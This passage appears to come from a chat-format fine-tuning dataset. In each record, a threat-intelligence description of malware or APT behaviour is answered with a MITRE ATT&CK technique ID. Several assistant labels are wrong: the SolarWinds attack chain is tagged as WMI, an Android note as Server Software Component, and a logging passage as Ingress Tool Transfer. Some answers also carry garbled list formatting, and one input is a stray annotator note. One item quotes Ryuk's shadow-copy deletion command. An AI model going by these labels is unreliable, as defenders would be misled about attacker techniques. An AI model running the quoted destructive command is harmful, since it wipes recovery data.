- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The configuration and strings are encrypted using 3DES and Base64 encoding"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Use of Open Source Tools In an attempt to avoid detection and as an anti-analysis tactic, the OilRig group abused an open source tool called Invoke-Obfuscation to obfuscate the code used for QUADAGENT. Invoke-Obfuscation is freely available via a Github repository and allows a user to change the visual representation of a PowerShell script simply by selecting the desired obfuscation techniques. Invoke-Obfuscation offers a variety of obfuscation techniques, and by analyzing the script we were able to ascertain the specific options in this attack. After identifying the specific options used to obfuscate QUADAGENT, we were able to deobfuscate the PowerShell script and perform additional analysis. We found two obfuscation techniques applied to the script: the first one changing the representation of variables; the second one changing the representation of strings in the script. Invoke-Obfuscation calls the string obfuscation used by the actors to further obfuscate this script Reorder, which uses the string formatting functionality within PowerShell to reconstruct strings from out of order substrings (ex. 1}{0}\" -f 'bar','foo'). During our analysis, we installed Invoke-Obfuscation and used it to obfuscate a previously collected QUADAGENT sample to confirm our analysis"
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ryuk has used \"vssadmin Delete Shadows /all /quiet\" to to delete volume shadow copies and \"vssadmin resize shadowstorage\" to force deletion of shadow copies created by third-party applications."
- },
- {
- "role": "assistant",
- "content": "T1490 - Inhibit System Recovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Operation Wocao has used a custom collection method to intercept two-factor authentication soft tokens."
- },
- {
- "role": "assistant",
- "content": "T1111 - Multi-Factor Authentication Interception"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Remsec has a package that collects documents from any inserted USB sticks."
- },
- {
- "role": "assistant",
- "content": "T1025 - Data from Removable Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AADInternals can create and export various authentication certificates, including those associated with Azure AD joined/registered devices."
- },
- {
- "role": "assistant",
- "content": "T1649 - Steal or Forge Authentication Certificates"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "smb and exploit in same sentence"
- },
- {
- "role": "assistant",
- "content": "T1210 - Exploitation of Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has the capability to retrieve information about groups."
- },
- {
- "role": "assistant",
- "content": "T1069 - Permission Groups Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "REvil can use WMI to monitor for and kill specific processes listed in its configuration file."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Maze has used WMI to attempt to delete the shadow volumes on a machine, and to connect a virtual machine to the network domain of the victim organization's network."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "encrypts strings in the backdoor using a custom XOR algorithm."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OSX/Shlayer has relied on users mounting and executing a malicious DMG file."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "1) Using the compromised SolarWinds DLL to activate a backdoor that enables attackers to remotely control and operate on a device 2) Using the backdoor access to steal credentials, escalate privileges, and move laterally to gain the ability to create valid SAML tokens using any of two methods: Stealing the SAML signing certificate (Path 1) Adding to or modifying existing federation trust (Path 2) 3) Stealing the SAML signing certificate (Path 1) 4) Adding to or modifying existing federation trust (Path 2) 5) Using attacker-created SAML tokens to access cloud resources and perform actions leading to the exfiltration of emails and persistence in the cloud"
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LAPSUS$ has deleted the target's systems and resources in the cloud to trigger the organization's incident and crisis response process."
- },
- {
- "role": "assistant",
- "content": "T1578.003 - Delete Cloud Instance"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The second generation (2.x) was used to conduct an attack which we investigated during its active stage. We successfully prevented data transfer to the cybercriminals’ server and isolated the infected systems in the company’s local network. The incidents, as well as results of our investigation, are described in the full report on the Winnti group (PDF"
- },
- {
- "role": "assistant",
- "content": "T1014 - Rootkit"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OSX_OCEANLOTUS.D has variants that check a number of system parameters to see if it is being run on real hardware or in a virtual machine environment, such as \"sysctl hw.model\"."
- },
- {
- "role": "assistant",
- "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The communication between the cryptojacking bot and its mining server is made by using the Stratum protocol on port 10001 and is controlled by the execution of the spreadXfghij.exe program"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Neoichor can identify the system language on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1614.001 - System Location Discovery: System Language Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "When combined with email tracking software, APT32 was able to closely track phishing delivery, success rate, and conduct further analysis about victim organizations while monitoring the interest of security firms"
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Offset Description 0x0 Victim GUID (8C8CEED9-4326-448B-919E-249EEC0238A3) 0x25 Victim IP Address (192.168.180.154) 0x45 Command (0x66660001) 0x49 Length of payload (0x2f – 47) 0x4d Field 1 – Windows major version (0x6 – Windows Vista+) 0x51 Field 2 – Windows minor version (0x1 – Windows 7) 0x55 Field 3 – Unknown (0x20) 0x59 Payload (default flag:4/2/2018 1:01:33 AM) Table 5 – Beacon structure for PLAINTEE"
- },
- {
- "role": "assistant",
- "content": "T1010 - Application Window Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Like most ransomware, Sodinokibi encrypts files and adds a random extension such as “test.jpg.1cd8t9ahd5” (Data Encrypted for Impact, ATT&CK T1486). It also drops a ransom note in folders that contain encrypted files. The name of the ransom note is the random extension added to the encrypted files. For example, if the extension is \".1cd8t9ahd5\", the ransom message filename will be called \"1cd8t9ahd5-HOW-TO-DECRYPT.txt"
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Clop can uninstall or disable security products."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Winnti for Windows dropper component can verify the existence of a single command line parameter and either terminate if it is not found or later use it as a decryption key."
- },
- {
- "role": "assistant",
- "content": "T1480.001 - Environmental Keying"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ROKRAT can retrieve additional malicious payloads from its C2 server."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LightNeuron has used a malicious Microsoft Exchange transport agent for persistence."
- },
- {
- "role": "assistant",
- "content": "T1505.002 - Server Software Component: Transport Agent"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Although there are no previously known malicious Android applications attributed to the StrongPity group, we strongly believe that the threat actor is in the process of actively developing new malicious components that can be used to target Android platforms."
- },
- {
- "role": "assistant",
- "content": "T1505 - Server Software Component"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Koadic has used PowerShell to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "C2 traffic is base64-encoded."
- },
- {
- "role": "assistant",
- "content": "T1132 - Data Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A variant encodes C2 POST data base64."
- },
- {
- "role": "assistant",
- "content": "T1132 - Data Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Invoke-WmiCommand CodeExecution module uses WMI to execute and retrieve the output from a payload."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT3 has been known to add created accounts to local admin groups to maintain elevated access."
- },
- {
- "role": "assistant",
- "content": "T1098 - Account Manipulation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cardinal RAT can collect the username from a victim machine."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has exploited Adobe Flash vulnerability CVE-2018-4878 for execution."
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If the configuration is parsed successfully, the program writes the string \"Meteor has started. to an encrypted log file, suggesting that the internal name of the malware is “Meteor“. As we will see later on in this article, another name was used in previous attacks. Throughout the entire execution of the malware, it keeps logging its actions to this same encrypted log file. Appendix C contains a helper script to decrypt the log file"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "will decrypt resources it downloads with HTTP requests by using RC4 with the key \"ScoutEagle.\""
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CORESHELL contains unused machine instructions in a likely attempt to hinder analysis."
- },
- {
- "role": "assistant",
- "content": "T1027.001 - Obfuscated Files or Information: Binary Padding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Duqu has used \"msiexec\" to execute malicious Windows Installer packages. Additionally, a PROPERTY=VALUE pair containing a 56-bit encryption key has been used to decrypt the main payload from the installer packages."
- },
- {
- "role": "assistant",
- "content": "T1218.007 - Signed Binary Proxy Execution: Msiexec"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT33 has used a variety of publicly available tools like LaZagne to gather credentials."
- },
- {
- "role": "assistant",
- "content": "T1003.004 - OS Credential Dumping: LSA Secrets', 'T1003.005 - OS Credential Dumping: Cached Domain Credentials', 'T1552.001 - Unsecured Credentials: Credentials In Files', 'T1555 - Credentials from Password Stores', 'T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Waterbear can query the Registry key \"\"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\MSDTC\\MTxOCI\"\" to see if the value `OracleOcilib` exists."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For early Gazer versions, the compilation timestamp was faked."
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TSCookie has the ability to upload and download files to and from the infected host."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT28 has used Tor and a variety of commercial VPN services to route brute force authentication attempts."
- },
- {
- "role": "assistant",
- "content": "T1133 - External Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bad Rabbit has been executed through user installation of an executable disguised as a flash installer."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Wizard Spider has used scheduled tasks to install TrickBot, using task names to appear legitimate such as WinDotNet, GoogleTask, or Sysnetsf. It has also used common document file names for other malware binaries."
- },
- {
- "role": "assistant",
- "content": "T1036.004 - Masquerading: Masquerade Task or Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "determines a working directory where it stores all the gathered data about the compromised machine."
- },
- {
- "role": "assistant",
- "content": "T1074 - Data Staged"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MiniDuke uses Google Search to identify C2 servers if its primary C2 method via Twitter is not working."
- },
- {
- "role": "assistant",
- "content": "T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used encoded PowerShell scripts uploaded to installations to download and install , as well as to evade defenses."
- },
- {
- "role": "assistant",
- "content": "T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ursnif has injected HTML codes into banking sites to steal sensitive online banking information (ex: usernames and passwords)."
- },
- {
- "role": "assistant",
- "content": "T1185 - Browser Session Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "According to the public source data, these airlines use services of the same IT service provider. It came to light that the cyberattack on this IT service provider affected 4,500,000 data subjects globally, including data related to Air India's customers. Compromise of Air India's network In mid-February 2021, Group-IB's Threat Intelligence & Attribution system detected infected devices that were part of Air India's computer network. It took the attackers 24 hours and 5 minutes to spread Cobalt Strike beacons to other devices in the airline's network. ColunmTK Timeline Connections with APT41 Group-IB researchers believe with moderate confidence that the ColunmTK campaign was carried out by APT41, a prolific Chinese-speaking nation-state threat actor. According to Group-IB's Threat Intelligence & Attribution system, the threat actor has been active since at least 2007. APT41 is known for stealing digital certificates for its cyber espionage operations. The IP address was also used to host the Cobalt Strike framework and shared an SSL certificate, b3038101fd0e8b11c519f739f12c7e9b60234d3b, with ColunmTK's IP address 185[.]118[.]166[.]66. The file is very similar to one used by APT41 in a different campaign described by FireEye researchers. The files are very similar in the way they launch a DLL file as a service and create keys in the registry"
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Psylo has a command to conduct timestomping by setting a specified file’s timestamps to match those of a system file in the System32 directory."
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Invoke-Kerberoast module can request service tickets and return crackable ticket hashes."
- },
- {
- "role": "assistant",
- "content": "T1558.003 - Steal or Forge Kerberos Tickets: Kerberoasting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Emotet has used Powershell to retrieve the malicious payload and download additional resources like Mimikatz."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SideCopy has compromised domains for some of their infrastructure, including for C2 and staging malware."
- },
- {
- "role": "assistant",
- "content": "T1584.001 - Domains"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Silence has used \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\", \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\", and the Startup folder to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Wocao, threat actors edited variable names within the Impacket suite to avoid automated detection."
- },
- {
- "role": "assistant",
- "content": "T1027.005 - Indicator Removal from Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gelsemium has the ability to inject DLLs into specific processes."
- },
- {
- "role": "assistant",
- "content": "T1055.001 - Process Injection: Dynamic-link Library Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group malware IndiaIndia saves information gathered about the victim to a file that is saved in the %TEMP% directory, then compressed, encrypted, and uploaded to a C2 server."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Torisma has been Base64 encoded and AES encrypted."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mofang delivered spearphishing emails with malicious documents, PDFs, or Excel files attached."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has been known to pack their tools."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Having a Meterpreter session on a compromised computer allows for full control of the computer and exfiltration of any data, and in some cases lateral movement inside the organization"
- },
- {
- "role": "assistant",
- "content": "T1123 - Audio Capture', 'T1132 - Data Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RainyDay can use TCP in C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ROADTools can enumerate Azure AD systems and devices."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Harvest cookies and a password database for supported browsers. Supports: Win7 IE, Win10 IE, Edge, Chrome, and Naver Whale - Recursively search a path and upload file metadata (timestamps, size, and full path). - Spawn a thread to recursively search a path and upload files as a ZIP archive"
- },
- {
- "role": "assistant",
- "content": "T1539 - Steal Web Session Cookie"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 3 Hardware ID used by XAgent to uniquely identify compromised hosts When generating the URLs within the HTTP POST and GET requests, XAgent sets one HTTP parameter using a specific data structure that contains this agent_id value"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The NETWIRE binary has been executed via PowerShell script."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cannon can obtain a list of processes running on the system."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Magic Hound malware has used HTTP for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WastedLocker has the ability to save and execute files as an alternate data stream (ADS)."
- },
- {
- "role": "assistant",
- "content": "T1564.004 - Hide Artifacts: NTFS File Attributes"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
